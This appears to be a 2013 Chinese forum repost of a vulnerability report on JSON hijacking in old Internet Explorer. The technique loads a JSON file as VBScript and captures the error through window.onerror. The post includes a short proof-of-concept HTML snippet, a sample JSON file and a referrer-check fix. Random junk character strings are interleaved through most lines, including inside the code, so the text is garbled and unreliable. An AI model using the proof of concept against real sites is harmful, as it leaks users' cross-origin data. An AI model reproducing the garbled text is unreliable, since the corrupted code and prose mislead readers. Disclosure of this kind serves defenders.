简要描述:' q$ Z/ s7 J( B
$ v7 J: a+ H$ Y5 f* I3 _6 J
由于某些资源容器对数据处理不当导致json劫持漏洞.$ R* I( M7 a# r/ V4 Y$ g: C+ H5 Z
详细说明:6 J; P% i2 w/ T, v& a
由于ie支持vbscript,所以script元素可以指定成vbscript语言:4 B) X6 V) V- D
<script language=vbscript></script>
* G+ t1 p6 g: g1 p 3 ^$ x4 ]% p7 d: H
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
# a& g0 \3 |8 }" b( p- z/ F漏洞证明:3 @* T4 a+ B; ?) o9 D$ _
<script>+ d% b1 q. G$ r0 l' I3 W
window.onerror=function(_){
+ F5 \! h# f, b' Balert(_)
" ^0 z6 y0 i! E' P3 m2 J}
. S) J t# W4 Y9 Z2 K</script>7 Z+ ?) p* l. m- |& p
<script language=vbscript src=1.json></script>
9 y' O- i% c% x3 N 1 m, {: ^# }( I# i
+ r k5 k( ?( g8 h1 L$ i
1.json: F& P% u& x; @8 d0 k
[{"name":"sogili","age":19}]
! i, H& X9 E0 h/ X1 v修复方案:
8 B, h- k, {) t7 q$ B网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对